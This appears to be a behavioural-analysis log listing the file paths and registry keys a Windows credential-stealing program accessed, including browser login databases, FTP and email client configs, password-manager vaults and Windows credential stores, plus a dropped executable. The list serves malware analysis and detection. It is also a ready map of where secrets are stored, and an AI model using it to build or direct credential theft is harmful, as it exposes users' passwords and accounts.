C:\Users\Rebecca\AppData\Roaming\Mozilla\Firefox\Profiles\48wgv2fv.default\signons2.txt
C:\Users\Rebecca\AppData\Roaming\Mozilla\Firefox\Profiles\48wgv2fv.default\signons3.txt
C:\Program Files\NETGATE\Black Hawk
C:\Program Files\Lunascape\Lunascape6\plugins\{9BDD5314-20A6-4d98-AB30-8325A95771EE}
C:\Users\Rebecca\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
C:\Users\Rebecca\AppData\Local\Comodo\Dragon\User Data\Default\Web Data
C:\Users\Rebecca\AppData\LocalComodo\Dragon\Login Data
C:\Users\Rebecca\AppData\LocalComodo\Dragon\Default\Login Data
C:\Users\Rebecca\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Login Data
C:\Users\Rebecca\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Web Data
C:\Users\Rebecca\AppData\LocalMapleStudio\ChromePlus\Login Data
C:\Users\Rebecca\AppData\LocalMapleStudio\ChromePlus\Default\Login Data
C:\Users\Rebecca\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\Rebecca\AppData\Local\Nichrome\User Data\Default\Login Data
C:\Users\Rebecca\AppData\Local\Nichrome\User Data\Default\Web Data
C:\Users\Rebecca\AppData\LocalNichrome\Login Data
C:\Users\Rebecca\AppData\LocalNichrome\Default\Login Data
C:\Users\Rebecca\AppData\Local\RockMelt\User Data\Default\Login Data
C:\Users\Rebecca\AppData\Local\RockMelt\User Data\Default\Web Data
C:\Users\Rebecca\AppData\LocalRockMelt\Login Data
C:\Users\Rebecca\AppData\LocalRockMelt\Default\Login Data
C:\Users\Rebecca\AppData\Local\Spark\User Data\Default\Login Data
C:\Users\Rebecca\AppData\Local\Spark\User Data\Default\Web Data
C:\Users\Rebecca\AppData\LocalSpark\Login Data
C:\Users\Rebecca\AppData\LocalSpark\Default\Login Data
C:\Users\Rebecca\AppData\Local\Chromium\User Data\Default\Login Data
C:\Users\Rebecca\AppData\Local\Chromium\User Data\Default\Web Data
C:\Users\Rebecca\AppData\LocalChromium\Login Data
C:\Users\Rebecca\AppData\LocalChromium\Default\Login Data
C:\Users\Rebecca\AppData\Local\Titan Browser\User Data\Default\Login Data
C:\Users\Rebecca\AppData\Local\Titan Browser\User Data\Default\Web Data
C:\Users\Rebecca\AppData\LocalTitan Browser\Login Data
C:\Users\Rebecca\AppData\LocalTitan Browser\Default\Login Data
C:\Users\Rebecca\AppData\Local\Torch\User Data\Default\Login Data
C:\Users\Rebecca\AppData\Local\Torch\User Data\Default\Web Data
C:\Users\Rebecca\AppData\LocalTorch\Login Data
C:\Users\Rebecca\AppData\LocalTorch\Default\Login Data
C:\Users\Rebecca\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data
C:\Users\Rebecca\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Data
C:\Users\Rebecca\AppData\LocalYandex\YandexBrowser\Login Data
C:\Users\Rebecca\AppData\LocalYandex\YandexBrowser\Default\Login Data
C:\Users\Rebecca\AppData\Local\Epic Privacy Browser\User Data\Default\Login Data
C:\Users\Rebecca\AppData\Local\Epic Privacy Browser\User Data\Default\Web Data
C:\Users\Rebecca\AppData\LocalEpic Privacy Browser\Login Data
C:\Users\Rebecca\AppData\LocalEpic Privacy Browser\Default\Login Data
C:\Users\Rebecca\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
C:\Users\Rebecca\AppData\Local\CocCoc\Browser\User Data\Default\Web Data
C:\Users\Rebecca\AppData\LocalCocCoc\Browser\Login Data
C:\Users\Rebecca\AppData\LocalCocCoc\Browser\Default\Login Data
C:\Users\Rebecca\AppData\Local\Vivaldi\User Data\Default\Login Data
C:\Users\Rebecca\AppData\Local\Vivaldi\User Data\Default\Web Data
C:\Users\Rebecca\AppData\LocalVivaldi\Login Data
C:\Users\Rebecca\AppData\LocalVivaldi\Default\Login Data
C:\Users\Rebecca\AppData\Local\Comodo\Chromodo\User Data\Default\Login Data
C:\Users\Rebecca\AppData\Local\Comodo\Chromodo\User Data\Default\Web Data
C:\Users\Rebecca\AppData\LocalComodo\Chromodo\Login Data
C:\Users\Rebecca\AppData\LocalComodo\Chromodo\Default\Login Data
C:\Users\Rebecca\AppData\Local\Superbird\User Data\Default\Login Data
C:\Users\Rebecca\AppData\Local\Superbird\User Data\Default\Web Data
C:\Users\Rebecca\AppData\LocalSuperbird\Login Data
C:\Users\Rebecca\AppData\LocalSuperbird\Default\Login Data
C:\Users\Rebecca\AppData\Local\Coowon\Coowon\User Data\Default\Login Data
C:\Users\Rebecca\AppData\Local\Coowon\Coowon\User Data\Default\Web Data
C:\Users\Rebecca\AppData\LocalCoowon\Coowon\Login Data
C:\Users\Rebecca\AppData\LocalCoowon\Coowon\Default\Login Data
C:\Users\Rebecca\AppData\Local\Mustang Browser\User Data\Default\Login Data
C:\Users\Rebecca\AppData\Local\Mustang Browser\User Data\Default\Web Data
C:\Users\Rebecca\AppData\LocalMustang Browser\Login Data
C:\Users\Rebecca\AppData\LocalMustang Browser\Default\Login Data
C:\Users\Rebecca\AppData\Local\360Browser\Browser\User Data\Default\Login Data
C:\Users\Rebecca\AppData\Local\360Browser\Browser\User Data\Default\Web Data
C:\Users\Rebecca\AppData\Local360Browser\Browser\Login Data
C:\Users\Rebecca\AppData\Local360Browser\Browser\Default\Login Data
C:\Users\Rebecca\AppData\Local\CatalinaGroup\Citrio\User Data\Default\Login Data
C:\Users\Rebecca\AppData\Local\CatalinaGroup\Citrio\User Data\Default\Web Data
C:\Users\Rebecca\AppData\LocalCatalinaGroup\Citrio\Login Data
C:\Users\Rebecca\AppData\LocalCatalinaGroup\Citrio\Default\Login Data
C:\Users\Rebecca\AppData\Local\Google\Chrome SxS\User Data\Default\Login Data
C:\Users\Rebecca\AppData\Local\Google\Chrome SxS\User Data\Default\Web Data
C:\Users\Rebecca\AppData\LocalGoogle\Chrome SxS\Login Data
C:\Users\Rebecca\AppData\LocalGoogle\Chrome SxS\Default\Login Data
C:\Users\Rebecca\AppData\Local\Orbitum\User Data\Default\Login Data
C:\Users\Rebecca\AppData\Local\Orbitum\User Data\Default\Web Data
C:\Users\Rebecca\AppData\LocalOrbitum\Login Data
C:\Users\Rebecca\AppData\LocalOrbitum\Default\Login Data
C:\Users\Rebecca\AppData\Local\Iridium\User Data\Default\Login Data
C:\Users\Rebecca\AppData\Local\Iridium\User Data\Default\Web Data
C:\Users\Rebecca\AppData\LocalIridium\Login Data
C:\Users\Rebecca\AppData\LocalIridium\Default\Login Data
C:\Users\Rebecca\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Login Data
C:\Users\Rebecca\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Web Data
C:\Users\Rebecca\AppData\Roaming\Opera\Opera Next\data\Login Data
C:\Users\Rebecca\AppData\Roaming\Opera\Opera Next\data\Default\Login Data
C:\Users\Rebecca\AppData\Roaming\Opera Software\Opera Stable\User Data\Default\Login Data
C:\Users\Rebecca\AppData\Roaming\Opera Software\Opera Stable\User Data\Default\Web Data
C:\Users\Rebecca\AppData\Roaming\Opera Software\Opera Stable\Login Data
C:\Users\Rebecca\AppData\Roaming\Opera Software\Opera Stable\Default\Login Data
C:\Users\Rebecca\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\User Data\Default\Login Data
C:\Users\Rebecca\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\User Data\Default\Web Data
C:\Users\Rebecca\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\Login Data
C:\Users\Rebecca\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\Default\Login Data
C:\Users\Rebecca\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\User Data\Default\Login Data
C:\Users\Rebecca\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\User Data\Default\Web Data
C:\Users\Rebecca\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\Login Data
C:\Users\Rebecca\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\Default\Login Data
C:\Users\Rebecca\AppData\Local\QupZilla\profiles\default\browsedata.db
C:\Users\Rebecca\AppData\Roaming\Opera
C:\Users\Rebecca\AppData\Roaming\.purple\accounts.xml
C:\Users\Rebecca\Documents\SuperPutty
C:\Program Files\FTPShell\ftpshell.fsi
C:\Users\Rebecca\AppData\Roaming\Notepad++\plugins\config\NppFTP\NppFTP.xml
C:\Program Files\oZone3D\MyFTP\myftp.ini
C:\Users\Rebecca\AppData\Roaming\FTPBox\profiles.conf
C:\Program Files\Sherrod Computers\sherrod FTP\favorites
C:\Program Files\FTP Now\sites.xml
C:\Program Files\NexusFile\userdata\ftpsite.ini
C:\Users\Rebecca\AppData\Roaming\NexusFile\ftpsite.ini
C:\Users\Rebecca\Documents\NetSarang\Xftp\Sessions
C:\Users\Rebecca\AppData\Roaming\NetSarang\Xftp\Sessions
C:\Program Files\EasyFTP\data
C:\Users\Rebecca\AppData\Roaming\SftpNetDrive
C:\Program Files\AbleFTP7\encPwd.jsd
C:\Program Files\AbleFTP7\data\settings\sshProfiles-j.jsd
C:\Program Files\AbleFTP7\data\settings\ftpProfiles-j.jsd
C:\Program Files\AbleFTP8\encPwd.jsd
C:\Program Files\AbleFTP8\data\settings\sshProfiles-j.jsd
C:\Program Files\AbleFTP8\data\settings\ftpProfiles-j.jsd
C:\Program Files\AbleFTP9\encPwd.jsd
C:\Program Files\AbleFTP9\data\settings\sshProfiles-j.jsd
C:\Program Files\AbleFTP9\data\settings\ftpProfiles-j.jsd
C:\Program Files\AbleFTP10\encPwd.jsd
C:\Program Files\AbleFTP10\data\settings\sshProfiles-j.jsd
C:\Program Files\AbleFTP10\data\settings\ftpProfiles-j.jsd
C:\Program Files\AbleFTP11\encPwd.jsd
C:\Program Files\AbleFTP11\data\settings\sshProfiles-j.jsd
C:\Program Files\AbleFTP11\data\settings\ftpProfiles-j.jsd
C:\Program Files\AbleFTP12\encPwd.jsd
C:\Program Files\AbleFTP12\data\settings\sshProfiles-j.jsd
C:\Program Files\AbleFTP12\data\settings\ftpProfiles-j.jsd
C:\Program Files\AbleFTP13\encPwd.jsd
C:\Program Files\AbleFTP13\data\settings\sshProfiles-j.jsd
C:\Program Files\AbleFTP13\data\settings\ftpProfiles-j.jsd
C:\Program Files\AbleFTP14\encPwd.jsd
C:\Program Files\AbleFTP14\data\settings\sshProfiles-j.jsd
C:\Program Files\AbleFTP14\data\settings\ftpProfiles-j.jsd
C:\Program Files\JaSFtp7\encPwd.jsd
C:\Program Files\JaSFtp7\data\settings\sshProfiles-j.jsd
C:\Program Files\JaSFtp7\data\settings\ftpProfiles-j.jsd
C:\Program Files\JaSFtp8\encPwd.jsd
C:\Program Files\JaSFtp8\data\settings\sshProfiles-j.jsd
C:\Program Files\JaSFtp8\data\settings\ftpProfiles-j.jsd
C:\Program Files\JaSFtp9\encPwd.jsd
C:\Program Files\JaSFtp9\data\settings\sshProfiles-j.jsd
C:\Program Files\JaSFtp9\data\settings\ftpProfiles-j.jsd
C:\Program Files\JaSFtp10\encPwd.jsd
C:\Program Files\JaSFtp10\data\settings\sshProfiles-j.jsd
C:\Program Files\JaSFtp10\data\settings\ftpProfiles-j.jsd
C:\Program Files\JaSFtp11\encPwd.jsd
C:\Program Files\JaSFtp11\data\settings\sshProfiles-j.jsd
C:\Program Files\JaSFtp11\data\settings\ftpProfiles-j.jsd
C:\Program Files\JaSFtp12\encPwd.jsd
C:\Program Files\JaSFtp12\data\settings\sshProfiles-j.jsd
C:\Program Files\JaSFtp12\data\settings\ftpProfiles-j.jsd
C:\Program Files\JaSFtp13\encPwd.jsd
C:\Program Files\JaSFtp13\data\settings\sshProfiles-j.jsd
C:\Program Files\JaSFtp13\data\settings\ftpProfiles-j.jsd
C:\Program Files\JaSFtp14\encPwd.jsd
C:\Program Files\JaSFtp14\data\settings\sshProfiles-j.jsd
C:\Program Files\JaSFtp14\data\settings\ftpProfiles-j.jsd
C:\Program Files\Automize7\encPwd.jsd
C:\Program Files\Automize7\data\settings\sshProfiles-j.jsd
C:\Program Files\Automize7\data\settings\ftpProfiles-j.jsd
C:\Program Files\Automize8\encPwd.jsd
C:\Program Files\Automize8\data\settings\sshProfiles-j.jsd
C:\Program Files\Automize8\data\settings\ftpProfiles-j.jsd
C:\Program Files\Automize9\encPwd.jsd
C:\Program Files\Automize9\data\settings\sshProfiles-j.jsd
C:\Program Files\Automize9\data\settings\ftpProfiles-j.jsd
C:\Program Files\Automize10\encPwd.jsd
C:\Program Files\Automize10\data\settings\sshProfiles-j.jsd
C:\Program Files\Automize10\data\settings\ftpProfiles-j.jsd
C:\Program Files\Automize11\encPwd.jsd
C:\Program Files\Automize11\data\settings\sshProfiles-j.jsd
C:\Program Files\Automize11\data\settings\ftpProfiles-j.jsd
C:\Program Files\Automize12\encPwd.jsd
C:\Program Files\Automize12\data\settings\sshProfiles-j.jsd
C:\Program Files\Automize12\data\settings\ftpProfiles-j.jsd
C:\Program Files\Automize13\encPwd.jsd
C:\Program Files\Automize13\data\settings\sshProfiles-j.jsd
C:\Program Files\Automize13\data\settings\ftpProfiles-j.jsd
C:\Program Files\Automize14\encPwd.jsd
C:\Program Files\Automize14\data\settings\sshProfiles-j.jsd
C:\Program Files\Automize14\data\settings\ftpProfiles-j.jsd
C:\Users\Rebecca\AppData\Roaming\Cyberduck
C:\Users\Rebecca\AppData\Roaming\iterate_GmbH
C:\Users\Rebecca\.config\fullsync\profiles.xml
C:\Users\Rebecca\AppData\Roaming\FTPInfo\ServerList.xml
C:\Users\Rebecca\AppData\Roaming\FTPInfo\ServerList.cfg
C:\Program Files\FileZilla\Filezilla.xml
C:\Users\Rebecca\AppData\Roaming\FileZilla\filezilla.xml
C:\Users\Rebecca\AppData\Roaming\FileZilla\recentservers.xml
C:\Users\Rebecca\AppData\Roaming\FileZilla\sitemanager.xml
C:\Program Files\Staff-FTP\sites.ini
C:\Users\Rebecca\AppData\Roaming\BlazeFtp\site.dat
C:\Program Files\Fastream NETFile\My FTP Links
C:\Program Files\GoFTP\settings\Connections.txt
C:\Users\Rebecca\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat
C:\Program Files\DeluxeFTP\sites.xml
C:\Windows\wcx_ftp.ini
C:\Users\Rebecca\AppData\Roaming\wcx_ftp.ini
C:\Users\Rebecca\wcx_ftp.ini
C:\Users\Rebecca\AppData\Roaming\GHISLER\wcx_ftp.ini
C:\Program Files\FTPGetter\Profile\servers.xml
C:\Users\Rebecca\AppData\Roaming\FTPGetter\servers.xml
C:\Program Files\WS_FTP\WS_FTP.INI
C:\Windows\WS_FTP.INI
C:\Users\Rebecca\AppData\Roaming\Ipswitch
C:\Users\Rebecca\site.xml
C:\Users\Rebecca\AppData\Local\PokerStars*
C:\Users\Rebecca\AppData\Local\ExpanDrive
C:\Users\Rebecca\AppData\Roaming\Steed\bookmarks.txt
C:\Users\Rebecca\AppData\Roaming\FlashFXP
C:\ProgramData\FlashFXP
C:\Users\Rebecca\AppData\Local\INSoftware\NovaFTP\NovaFTP.db
C:\Users\Rebecca\AppData\Roaming\NetDrive\NDSites.ini
C:\Users\Rebecca\AppData\Roaming\NetDrive2\drives.dat
C:\ProgramData\NetDrive2\drives.dat
C:\Users\Rebecca\AppData\Roaming\SmartFTP
C:\Users\Rebecca\AppData\Roaming\Far Manager\Profile\PluginsData\42E4AEB1-A230-44F4-B33C-F195BB654931.db
C:\Users\Rebecca\Documents\*.tlp
C:\Users\Rebecca\Documents\*.bscp
C:\Users\Rebecca\Documents\*.vnc
C:\Users\Rebecca\Desktop\*.vnc
C:\Users\Rebecca\Documents\mSecure
C:\ProgramData\Syncovery
C:\Program Files\FreshWebmaster\FreshFTP\FtpSites.SMF
C:\Users\Rebecca\AppData\Roaming\BitKinex\bitkinex.ds
C:\Users\Rebecca\AppData\Roaming\UltraFXP\sites.xml
C:\Users\Rebecca\AppData\Roaming\FTP Now\sites.xml
C:\Program Files\Odin Secure FTP Expert\QFDefault.QFQ
C:\Program Files\Odin Secure FTP Expert\SiteInfo.QFP
C:\Program Files\Foxmail\mail
C:\Foxmail*
C:\Users\Rebecca\AppData\Roaming\Pocomail\accounts.ini
C:\Users\Rebecca\Documents\Pocomail\accounts.ini
C:\Users\Rebecca\AppData\Roaming\GmailNotifierPro\ConfigData.xml
C:\Users\Rebecca\AppData\Roaming\DeskSoft\CheckMail
C:\Program Files\WinFtp Client\Favorites.dat
C:\Windows\32BitFtp.TMP
C:\Windows\32BitFtp.ini
C:\FTP Navigator\Ftplist.txt
C:\Softwarenetz\Mailing\Daten\mailing.vdt
C:\Users\Rebecca\AppData\Roaming\Opera Mail\Opera Mail\wand.dat
C:\Users\Rebecca\Documents\*Mailbox.ini
C:\Users\Rebecca\Documents\yMail2\POP3.xml
C:\Users\Rebecca\Documents\yMail2\SMTP.xml
C:\Users\Rebecca\Documents\yMail2\Accounts.xml
C:\Users\Rebecca\Documents\yMail\ymail.ini
C:\Users\Rebecca\AppData\Roaming\TrulyMail\Data\Settings\user.config
C:\Users\Rebecca\Documents\*.spn
C:\Users\Rebecca\Desktop\*.spn
C:\Users\Rebecca\AppData\Roaming\To-Do DeskList\tasks.db
C:\Users\Rebecca\AppData\Roaming\stickies\images
C:\Users\Rebecca\AppData\Roaming\stickies\rtf
C:\Users\Rebecca\AppData\Roaming\NoteFly\notes
C:\Users\Rebecca\AppData\Roaming\Conceptworld\Notezilla\Notes8.db
C:\Users\Rebecca\AppData\Roaming\Microsoft\Sticky Notes\StickyNotes.snt
C:\Users\Rebecca\Documents
C:\Users\Rebecca\Documents\*.kdbx
C:\Users\Rebecca\Desktop
C:\Users\Rebecca\Desktop\*.kdbx
C:\Users\Rebecca\Documents\*.kdb
C:\Users\Rebecca\Desktop\*.kdb
C:\Users\Rebecca\Documents\Enpass
C:\Users\Rebecca\Documents\My RoboForm Data
C:\Users\Rebecca\Documents\1Password
C:\Users\Rebecca\AppData\Local\Temp\Mikrotik\Winbox
C:\Users\Rebecca\AppData\Local\Temp\NETAPI32.DLL
C:\Windows\System32\netapi32.dll
C:\Users\Rebecca\AppData\Local\Temp\netutils.dll
C:\Windows\System32\netutils.dll
C:\Users\Rebecca\AppData\Local\Temp\srvcli.dll
C:\Windows\System32\srvcli.dll
C:\Users\Rebecca\AppData\Roaming\F569DD
C:\Users\Rebecca\AppData\Roaming\F569DD\D66C39.lck
C:\Users\Rebecca\AppData\Roaming\Microsoft\Credentials
C:\Users\Rebecca\AppData\Roaming\Microsoft\Credentials\*
C:\Users\Rebecca\AppData\Local\Microsoft\Credentials
C:\Users\Rebecca\AppData\Local\Microsoft\Credentials\*
C:\Users\Rebecca\AppData\Local\Temp\file.exe
C:\Users\Rebecca\AppData\Roaming\F569DD\D66C39.exe
C:\Windows\Temp
C:\Windows\System32\LogFiles\Scm\a1cfa52f-06f2-418d-addb-cd6456d66f43
C:\Program Files\Mozilla Firefox\nss3.dll
C:\Program Files\Mozilla Firefox\mozglue.dll
C:\Windows\System32\version.dll
C:\Windows\System32\dbghelp.dll
C:\Windows\System32\msvcp140.dll
C:\Windows\System32\VCRUNTIME140.dll
C:\Windows\System32\api-ms-win-crt-runtime-l1-1-0.dll
C:\Windows\System32\ucrtbase.dll
C:\Windows\System32\api-ms-win-core-timezone-l1-1-0.dll
C:\Windows\System32\api-ms-win-core-file-l2-1-0.dll
C:\Windows\System32\api-ms-win-core-localization-l1-2-0.dll
C:\Windows\System32\api-ms-win-core-processthreads-l1-1-1.dll
C:\Windows\System32\api-ms-win-core-file-l1-2-0.dll
C:\Windows\System32\api-ms-win-crt-string-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-heap-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-stdio-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-convert-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-locale-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-math-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-multibyte-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-time-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-filesystem-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-environment-l1-1-0.dll
C:\Windows\System32\api-ms-win-crt-utility-l1-1-0.dll
C:\Windows\System32\winmm.dll
C:\Windows\System32\wsock32.dll
C:\Users\Rebecca\AppData\Roaming\Mozilla\Firefox\profiles.ini
C:\Program Files\Mozilla Firefox\softokn3.dll
C:\Users\Rebecca\AppData\Roaming\Mozilla\Firefox\Profiles\48wgv2fv.default\pkcs11.txt
C:\Program Files\Mozilla Firefox\freebl3.dll
C:\Users\Rebecca\AppData\Roaming\Mozilla\Firefox\Profiles\48wgv2fv.default\cert9.db
C:\Users\Rebecca\AppData\Roaming\Mozilla\Firefox\Profiles\48wgv2fv.default\key4.db
C:\Users\Rebecca\AppData\Roaming\Mozilla\Firefox\Profiles\48wgv2fv.default\logins.json
C:\Users\Rebecca\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Windows\System32\netapi32.dll
C:\Windows\System32\netutils.dll
C:\Windows\System32\srvcli.dll
C:\Users\Rebecca\AppData\Roaming\F569DD\D66C39.lck
C:\Windows\System32\LogFiles\Scm\a1cfa52f-06f2-418d-addb-cd6456d66f43
C:\Users\Rebecca\AppData\Roaming\F569DD\D66C39.lck
C:\Users\Rebecca\AppData\Roaming\F569DD\D66C39.exe
C:\Users\Rebecca\AppData\Roaming\F569DD\D66C39.lck
C:\Users\Rebecca\AppData\Local\Temp\file.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT
HKEY_CURRENT_USER
DisableUserModeCallbackFilter
HKEY_CURRENT_USER\Software\Borland\Locales
HKEY_LOCAL_MACHINE\Software\Borland\Locales
HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography
\x5a60\x170EY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\75.0 (x86 en-GB)\Main
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\75.0 (x86 en-GB)\Main\Install Directory
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\ComodoGroup\IceDragon\Setup
HKEY_LOCAL_MACHINE\SOFTWARE\Apple Computer, Inc.\Safari
HKEY_LOCAL_MACHINE\SOFTWARE\K-Meleon
HKEY_LOCAL_MACHINE\SOFTWARE\mozilla.org\SeaMonkey
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\SeaMonkey
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Flock
HKEY_CURRENT_USER\Software\QtWeb.NET\QtWeb Internet Browser\AutoComplete
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2
HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox86
HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Pale Moon
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Waterfox
HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
HKEY_CURRENT_USER\Software\Ghisler\Total Commander
HKEY_CURRENT_USER\Software
HKEY_CURRENT_USER\Software\7-Zip
HKEY_CURRENT_USER\Software\Adobe
HKEY_CURRENT_USER\Software\AppDataLow
HKEY_CURRENT_USER\Software\Clients
HKEY_CURRENT_USER\Software\Google
HKEY_CURRENT_USER\Software\IM Providers
HKEY_CURRENT_USER\Software\JavaSoft
HKEY_CURRENT_USER\Software\Macromedia
HKEY_CURRENT_USER\Software\Michael Herf
HKEY_CURRENT_USER\Software\Microsoft
HKEY_CURRENT_USER\Software\Mozilla
HKEY_CURRENT_USER\Software\Netscape
HKEY_CURRENT_USER\Software\ODBC
HKEY_CURRENT_USER\Software\Piriform
HKEY_CURRENT_USER\Software\Policies
HKEY_CURRENT_USER\Software\Python
HKEY_CURRENT_USER\Software\WinRAR
HKEY_CURRENT_USER\Software\WinRAR SFX
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
HKEY_CURRENT_USER\Software\Bitvise\BvSshClient
HKEY_CURRENT_USER\Software\VanDyke\SecureFX
HKEY_LOCAL_MACHINE\Software\NCH Software\Fling\Accounts
HKEY_CURRENT_USER\Software\NCH Software\Fling\Accounts
HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions
HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions
HKEY_LOCAL_MACHINE\Software\9bis.com\KiTTY\Sessions
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird
HKEY_CURRENT_USER\Software\IncrediMail\Identities
HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities
HKEY_CURRENT_USER\Software\Martin Prikryl
HKEY_LOCAL_MACHINE\Software\Martin Prikryl
HKEY_LOCAL_MACHINE\SOFTWARE\Postbox\Postbox
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\FossaMail
HKEY_CURRENT_USER\Software\WinChips\UserAccounts
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
HKEY_CURRENT_USER\SOFTWARE\flaska.net\trojita
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanWorkstation\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout
HKEY_LOCAL_MACHINE\\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x41e\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x45c\xfffd\xfffd\x41b\xfffd\xfffd\xfffd\x42f\xfffd\xfffd\xfffd\xfffd\x419\xfffd\xfffd\x44f\xfffd\xfffd
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
